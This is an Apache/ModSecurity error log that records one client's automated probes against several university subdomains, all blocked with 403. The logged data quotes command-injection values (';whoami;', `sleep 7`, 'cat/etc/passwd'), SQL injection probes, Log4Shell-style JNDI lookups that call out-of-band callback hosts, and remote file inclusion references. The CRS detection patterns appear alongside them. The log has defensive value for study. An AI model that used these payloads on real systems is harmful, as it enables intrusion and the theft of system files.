[Tue Aug 29 11:33:26.443687 2023] [:error] [pid 1099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uploaddir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:uploaddir: ';whoami;'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/upgrade_handle.php"] [unique_id "ZO11FsCo-f0AAARLXwMAAAAQ"]
[Tue Aug 29 11:33:26.444381 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/forums/forumrunner/request.php"] [unique_id "ZO11FsCo-f0AAARy-tQAAAAb"]
[Tue Aug 29 11:33:26.445228 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/forums/forumrunner/request.php"] [unique_id "ZO11FsCo-f0AAARo8yUAAAAT"]
[Tue Aug 29 11:33:26.463903 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/forums/forumrunner/request.php"] [unique_id "ZO11FsCo-f0AAARy-tUAAAAb"]
[Tue Aug 29 11:33:26.469719 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/forums/forumrunner/request.php"] [unique_id "ZO11FsCo-f0AAARdiJUAAAAK"]
[Tue Aug 29 11:33:26.480096 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/forum/forumrunner/request.php"] [unique_id "ZO11FsCo-f0AAARjjMUAAAAL"]
[Tue Aug 29 11:33:26.486794 2023] [:error] [pid 905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:userName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:userName: ${jndi:ldap://${:-584}${:-462}.${hostName}.username.cjmn8l5jmimk2adbbnlg4baax9qor1zuf.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ui/login.action"] [unique_id "ZO11FsCo-f0AAAOJKdQAAAAE"]
[Tue Aug 29 11:33:26.489058 2023] [:error] [pid 1099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ReaderNo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ` found within ARGS:ReaderNo: `sleep 7`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/card_scan.php"] [unique_id "ZO11FsCo-f0AAARLXwUAAAAQ"]
[Tue Aug 29 11:33:26.498035 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:userName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:userName: ${jndi:ldap://${:-584}${:-462}.${hostName}.username.cjmn8l5jmimk2adbbnlgci9jiwf51ah5g.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/ui/login.action"] [unique_id "ZO11FsCo-f0AAARt-88AAAAV"]
[Tue Aug 29 11:33:26.500858 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:userName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:userName: ${jndi:ldap://${:-584}${:-462}.${hostName}.username.cjmn8l5jmimk2adbbnlgyx19wzq5dmpwn.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/ui/login.action"] [unique_id "ZO11FsCo-f0AAARTEOgAAAAG"]
[Tue Aug 29 11:33:26.506655 2023] [:error] [pid 905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:userName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:userName: ${jndi:ldap://${:-584}${:-462}.${hostName}.username.cjmn8l5jmimk2adbbnlghsm36hwbpeoot.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/ui/login.action"] [unique_id "ZO11FsCo-f0AAAOJKdUAAAAE"]
[Tue Aug 29 11:33:27.307856 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/vb/forumrunner/request.php"] [unique_id "ZO11F8Co-f0AAARt-9AAAAAV"]
[Tue Aug 29 11:33:27.309263 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/wp1/home-18/"] [unique_id "ZO11F8Co-f0AAARv7Q0AAAAY"]
[Tue Aug 29 11:33:27.313324 2023] [:error] [pid 1119] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/wp1/home-18/"] [unique_id "ZO11F8Co-f0AAARfwlAAAAAI"]
[Tue Aug 29 11:33:27.326372 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/wp1/home-18/"] [unique_id "ZO11F8Co-f0AAARA7gYAAAAA"]
[Tue Aug 29 11:33:27.326850 2023] [:error] [pid 1139] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/vb/forumrunner/request.php"] [unique_id "ZO11F8Co-f0AAARzXyAAAAAd"]
[Tue Aug 29 11:33:27.328247 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/wp1/home-18/"] [unique_id "ZO11F8Co-f0AAARTEOoAAAAG"]
[Tue Aug 29 11:33:27.332400 2023] [:error] [pid 905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp1/home-18/"] [unique_id "ZO11F8Co-f0AAAOJKdcAAAAE"]
[Tue Aug 29 11:33:27.343813 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/vb/forumrunner/request.php"] [unique_id "ZO11F8Co-f0AAARjjMgAAAAL"]
[Tue Aug 29 11:33:27.348125 2023] [:error] [pid 1139] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/vb/forumrunner/request.php"] [unique_id "ZO11F8Co-f0AAARzXyEAAAAd"]
[Tue Aug 29 11:33:27.351752 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:rootUname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:rootUname:  cat/etc/passwd #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/install/lib/ajaxHandlers/ajaxServerSettingsChk.php"] [unique_id "ZO11F8Co-f0AAARy-tkAAAAb"]
[Tue Aug 29 11:33:27.365527 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:rootUname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:rootUname:  cat/etc/passwd #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/install/lib/ajaxHandlers/ajaxServerSettingsChk.php"] [unique_id "ZO11F8Co-f0AAARA7ggAAAAA"]
[Tue Aug 29 11:33:27.367043 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:rootUname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:rootUname:  cat/etc/passwd #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/install/lib/ajaxHandlers/ajaxServerSettingsChk.php"] [unique_id "ZO11F8Co-f0AAARdiJoAAAAK"]
[Tue Aug 29 11:33:27.367911 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:rootUname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:rootUname:  cat/etc/passwd #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/install/lib/ajaxHandlers/ajaxServerSettingsChk.php"] [unique_id "ZO11F8Co-f0AAARo8yoAAAAT"]
[Tue Aug 29 11:33:27.387078 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:userName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:userName: ${jndi:ldap://${:-584}${:-462}.${hostName}.username.cjmn8l5jmimk2adbbnlgedgtjaz8tnabd.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/ui/login.action"] [unique_id "ZO11F8Co-f0AAARjjMoAAAAL"]
[Tue Aug 29 11:33:27.388076 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:rootUname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:rootUname:  cat/etc/passwd #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/install/lib/ajaxHandlers/ajaxServerSettingsChk.php"] [unique_id "ZO11F8Co-f0AAARt-9QAAAAV"]
[Tue Aug 29 11:33:27.390790 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/forums/forumrunner/request.php"] [unique_id "ZO11F8Co-f0AAARA7gkAAAAA"]
[Tue Aug 29 11:33:28.307520 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:rootUname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:rootUname:  cat/etc/passwd #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/install/lib/ajaxHandlers/ajaxServerSettingsChk.php"] [unique_id "ZO11GMCo-f0AAARt-9YAAAAV"]
[Tue Aug 29 11:33:28.367626 2023] [:error] [pid 1099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/forumrunner/request.php"] [unique_id "ZO11GMCo-f0AAARLXwwAAAAQ"]
[Tue Aug 29 11:33:28.392831 2023] [:error] [pid 1119] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/vb/forumrunner/request.php"] [unique_id "ZO11GMCo-f0AAARfwlgAAAAI"]
[Tue Aug 29 11:33:28.401341 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/wp1/home-18/"] [unique_id "ZO11GMCo-f0AAARjjNAAAAAL"]
[Tue Aug 29 11:33:29.312297 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/sitecore/shell/ClientBin/Reporting/Report.ashx"] [unique_id "ZO11GcCo-f0AAARjjNIAAAAL"]
